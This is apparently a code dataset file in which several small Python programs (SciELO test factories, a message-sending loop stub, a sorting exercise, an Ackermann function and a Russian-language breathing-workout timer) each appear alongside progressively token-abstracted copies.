factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class 
token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass 
PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = 
u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass ArticleFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class 
token>\n<class token>\n<class token>\n<class token>\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass ArticleAssetFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n" ]
false
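The steps above reduce a set of factory_boy factories for SciELO journal/article models to `<class token>` placeholders. The record uses the legacy `FACTORY_FOR` attribute; factory_boy 2.4+ declares the target via an inner `Meta` class instead. A minimal self-contained sketch of the same pattern, with a plain stand-in class because the real Django models are not part of this dump:

# Sketch of the factory pattern from the record above; `Article` is a
# hypothetical stand-in for the real scielomanager model.
import factory


class Article:
    def __init__(self, journal_title, issn_ppub, doi):
        self.journal_title = journal_title
        self.issn_ppub = issn_ppub
        self.doi = doi


class ArticleFactory(factory.Factory):
    class Meta:                      # modern replacement for FACTORY_FOR
        model = Article

    journal_title = u'Revista de Saúde Pública'
    issn_ppub = u'0034-8910'
    doi = factory.Sequence(lambda n: '10.1590/S0034-8910.%s' % n)  # unique per instance


print(ArticleFactory().doi)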
32
81dfdf0479fc1f136fa5153840d8c7015f9db676
# required !!! # pip install selenium # pip install webdriver-manager from theMachine import loops # fill the number and message # you can fill the number with array phoneNumber = "fill the number" message = "fill with ur message" loop = 1 # this how many u want to loop loops(loop, phoneNumber, message) # input how many u want to loop
[ "# required !!!\r\n# pip install selenium\r\n# pip install webdriver-manager\r\n\r\nfrom theMachine import loops\r\n\r\n# fill the number and message\r\n# you can fill the number with array\r\nphoneNumber = \"fill the number\"\r\nmessage = \"fill with ur message\"\r\nloop = 1 # this how many u want to loop\r\n\r\nloops(loop, phoneNumber, message) # input how many u want to loop\r\n", "from theMachine import loops\nphoneNumber = 'fill the number'\nmessage = 'fill with ur message'\nloop = 1\nloops(loop, phoneNumber, message)\n", "<import token>\nphoneNumber = 'fill the number'\nmessage = 'fill with ur message'\nloop = 1\nloops(loop, phoneNumber, message)\n", "<import token>\n<assignment token>\nloops(loop, phoneNumber, message)\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
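Record 32 imports `loops` from a local `theMachine` module that is not included in the dump. A hedged sketch of what such a helper could look like with the libraries the header comments ask for (selenium and webdriver-manager); it only pre-fills the WhatsApp Web message via the URL, since automating the send button depends on page selectors that change often:

# Hypothetical implementation of theMachine.loops; the function name and
# signature come from the record, everything else is an assumption.
import time
import urllib.parse

from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from webdriver_manager.chrome import ChromeDriverManager


def loops(count, phone_number, message):
    driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))
    text = urllib.parse.quote(message)
    for _ in range(count):
        # Opens a chat with the message pre-filled; sending stays manual.
        driver.get(f'https://web.whatsapp.com/send?phone={phone_number}&text={text}')
        time.sleep(30)
    driver.quit()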
33
24de4f486d4e976850e94a003f8d9cbe3e518402
a= input("Enter number") a= a.split() b=[] for x in a: b.append(int(x)) print(b) l=len(b) c=0 s=0 for i in range(l): s=len(b[:i]) for j in range(s): if b[s]<b[j]: c=b[s] b.pop(s) b.insert(b.index(b[j]),c) print(b,b[:i],b[s])
[ "a= input(\"Enter number\")\r\na= a.split()\r\nb=[]\r\nfor x in a:\r\n b.append(int(x)) \r\n\r\nprint(b)\r\nl=len(b)\r\nc=0\r\ns=0\r\nfor i in range(l):\r\n s=len(b[:i])\r\n for j in range(s):\r\n \r\n if b[s]<b[j]:\r\n c=b[s]\r\n b.pop(s)\r\n b.insert(b.index(b[j]),c)\r\n print(b,b[:i],b[s])\r\n\r\n", "a = input('Enter number')\na = a.split()\nb = []\nfor x in a:\n b.append(int(x))\nprint(b)\nl = len(b)\nc = 0\ns = 0\nfor i in range(l):\n s = len(b[:i])\n for j in range(s):\n if b[s] < b[j]:\n c = b[s]\n b.pop(s)\n b.insert(b.index(b[j]), c)\n print(b, b[:i], b[s])\n", "<assignment token>\nfor x in a:\n b.append(int(x))\nprint(b)\n<assignment token>\nfor i in range(l):\n s = len(b[:i])\n for j in range(s):\n if b[s] < b[j]:\n c = b[s]\n b.pop(s)\n b.insert(b.index(b[j]), c)\n print(b, b[:i], b[s])\n", "<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
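Record 33 is an insertion-sort attempt: it runs, but `b.insert(b.index(b[j]), c)` looks up the *first* occurrence of a value, so inputs with duplicates can be sorted incorrectly, and the debug `print` fires on every comparison. The standard formulation of the same idea:

# Classic insertion sort, the algorithm record 33 is reaching for,
# without the list.index() lookup that breaks on duplicate values.
def insertion_sort(values):
    for i in range(1, len(values)):
        current = values[i]
        j = i - 1
        while j >= 0 and values[j] > current:
            values[j + 1] = values[j]  # shift larger elements right
            j -= 1
        values[j + 1] = current
    return values


print(insertion_sort([5, 2, 4, 2, 1]))  # [1, 2, 2, 4, 5]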
34
0ecd2a298203365b20b2369a99c3c1d7c0646f19
# coding: utf-8 #ack program with the ackermann_function """ ackermann_function """ def ack(m,n): #n+1 if m = 0 if m is 0: return n + 1 #A(m−1, 1) if m > 0 and n = 0 if m > 0 and n is 0: return ack(m-1, 1) #A(m−1, A(m, n−1)) if m > 0 and n > 0 if m > 0 and n > 0: return ack(m-1, ack(m, n - 1)) if __name__ == "__main__": expected = [[1,2,3,4,5], [2,3,4,5,6], [3,5,7,9,11], [5,13,29,61,125]] ok = True for m in range(4): for n in range(5): actual = ack(m,n) if not actual == expected[m][n]: print "error" ok = False if ok: print "All tests pass"
[ "# coding: utf-8\n#ack program with the ackermann_function\n\n\"\"\" ackermann_function \"\"\"\ndef ack(m,n):\n #n+1 if m = 0\n if m is 0:\n \treturn n + 1\n #A(m−1, 1) if m > 0 and n = 0 \n if m > 0 and n is 0:\n \treturn ack(m-1, 1)\n #A(m−1, A(m, n−1)) if m > 0 and n > 0\n if m > 0 and n > 0:\n \treturn ack(m-1, ack(m, n - 1))\n\nif __name__ == \"__main__\":\n\texpected = [[1,2,3,4,5],\n\t\t\t\t[2,3,4,5,6],\n\t\t\t\t[3,5,7,9,11],\n\t\t\t\t[5,13,29,61,125]]\n\tok = True\n\tfor m in range(4):\n\t\tfor n in range(5):\n\t\t\tactual = ack(m,n)\n\t\t\tif not actual == expected[m][n]:\n\t\t\t\tprint \"error\"\n\t\t\t\tok = False\n\tif ok:\n\t\tprint \"All tests pass\"\n\n\t" ]
true
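Record 34 is flagged `error: true`: its Python 2 `print` statements do not parse under Python 3, so the steps list holds only the raw source. Two other things are worth fixing in a port: `m is 0` tests identity rather than equality (it only works for small integers by CPython implementation accident), and `n > 0` on the last branch is redundant once the first two cases are handled. A direct Python 3 rewrite:

# Python 3 port of record 34's Ackermann function and its self-test.
def ack(m, n):
    if m == 0:           # `is 0` replaced with `== 0`
        return n + 1
    if n == 0:
        return ack(m - 1, 1)
    return ack(m - 1, ack(m, n - 1))


if __name__ == "__main__":
    expected = [[1, 2, 3, 4, 5],
                [2, 3, 4, 5, 6],
                [3, 5, 7, 9, 11],
                [5, 13, 29, 61, 125]]
    ok = all(ack(m, n) == expected[m][n] for m in range(4) for n in range(5))
    print("All tests pass" if ok else "error")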
35
a98be930058269a6adbc9a28d1c0ad5d9abba136
import sys import time import pymorphy2 import pyglet import pyttsx3 import threading import warnings import pytils warnings.filterwarnings("ignore") """ Количество раундов, вдохов в раунде, задержка дыхания на вдохе""" rounds, breaths, hold = 4, 30, 13 def play_wav(src): wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav') wav.play() time.sleep(wav.duration) def play_wav_inline(src): wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav') wav.play() def correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()): new_phrase = [] py_gen = 1 phrase = phrase.split(' ') while phrase: word = phrase.pop(-1) if 'NUMB' in morph.parse(word)[0].tag: new_phrase.append(pytils.numeral.sum_string(int(word), py_gen)) else: new_phrase.append(word) py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0].tag else pytils.numeral.MALE return ' '.join(new_phrase[::-1]) def nums(phrase, morph=pymorphy2.MorphAnalyzer()): """ согласование существительных с числительными, стоящими перед ними """ phrase = phrase.replace(' ', ' ').replace(',', ' ,') numeral = '' new_phrase = [] for word in phrase.split(' '): if 'NUMB' in morph.parse(word)[0].tag: numeral = word if numeral: word = str(morph.parse(word)[0].make_agree_with_number(abs(int(numeral))).word) new_phrase.append(word) return ' '.join(new_phrase).replace(' ,', ',') def speak(what): speech_voice = 3 # голосовой движок rate = 120 tts = pyttsx3.init() voices = tts.getProperty("voices") tts.setProperty('rate', rate) tts.setProperty("voice", voices[speech_voice].id) print('🔊', what) what = correct_numerals(what) tts.say(what) tts.runAndWait() # tts.stop() class Workout: def __init__(self, rounds=3, breaths=30, hold=15): self.rounds = rounds self.breaths = breaths self.hold = hold self.round_times = [] self.lock = threading.Lock() # взаимоблокировка отдельных голосовых потоков def __str__(self): return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold) def __hold_breath(self): start_time = time.time() input() seconds = int(time.time() - start_time) mins = seconds // 60 secs = seconds % 60 self.round_times.append('{:02}:{:02}'.format(mins, secs)) play_wav_inline('inhale') self.say('Глубокий вдох. ' + nums("{} минута {} секунда".format(mins, secs))) def __clock_tick(self): for i in range(self.hold): if i < hold - 3: time.sleep(1) else: play_wav('clock') play_wav_inline('gong2') def __breathe_round(self, round): self.say('Раунд ' + str(round)) for i in range(self.breaths): if i % 10 == 0: play_wav_inline('gong') play_wav('inhale') print(i + 1, end=' ') play_wav('exhale') print() self.say('Задерживаем дыхание на выдохе') self.__hold_breath() # self.say('Держим ' + nums(str(self.hold) + ' секунда')) self.__clock_tick() play_wav_inline('exhale') self.say('Выдох') time.sleep(1) def breathe(self): self.say('Выполняем ' + nums(str(self.rounds) + ' раунд')) self.say('Каждый раунд это ' + nums(str(self.breaths) + ' глубокий вдох - и спокойный выдох')) self.say('Приготовились...') for i in range(self.rounds): self.__breathe_round(i + 1) self.say('Восстанавливаем дыхание.') def statistics(self): print('=============') for i in range(len(self.round_times)): print('Раунд', i, self.round_times[i]) print('=============') def say(self, what): self.lock.acquire() thread = threading.Thread(target=speak, kwargs={'what': what}) thread.start() thread.join() self.lock.release() workout = Workout(rounds, breaths, hold) workout.breathe() workout.statistics()
[ "import sys\nimport time\nimport pymorphy2\nimport pyglet\nimport pyttsx3\nimport threading\nimport warnings\nimport pytils\n\nwarnings.filterwarnings(\"ignore\")\n\n\"\"\" Количество раундов, вдохов в раунде, задержка дыхания на вдохе\"\"\"\nrounds, breaths, hold = 4, 30, 13\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(numeral))).word)\n new_phrase.append(word)\n\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3 # голосовой движок\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty(\"voices\")\n tts.setProperty('rate', rate)\n tts.setProperty(\"voice\", voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n # tts.stop()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock() # взаимоблокировка отдельных голосовых потоков\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums(\"{} минута {} секунда\".format(mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n # self.say('Держим ' + nums(str(self.hold) + ' секунда'))\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) + ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\nworkout = Workout(rounds, breaths, hold)\nworkout.breathe()\n\nworkout.statistics()\n", "import sys\nimport time\nimport pymorphy2\nimport pyglet\nimport pyttsx3\nimport threading\nimport warnings\nimport pytils\nwarnings.filterwarnings('ignore')\n<docstring token>\nrounds, breaths, hold = 4, 30, 13\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty('voices')\n tts.setProperty('rate', rate)\n tts.setProperty('voice', voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n 
self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\nworkout = Workout(rounds, breaths, hold)\nworkout.breathe()\nworkout.statistics()\n", "<import token>\nwarnings.filterwarnings('ignore')\n<docstring token>\nrounds, breaths, hold = 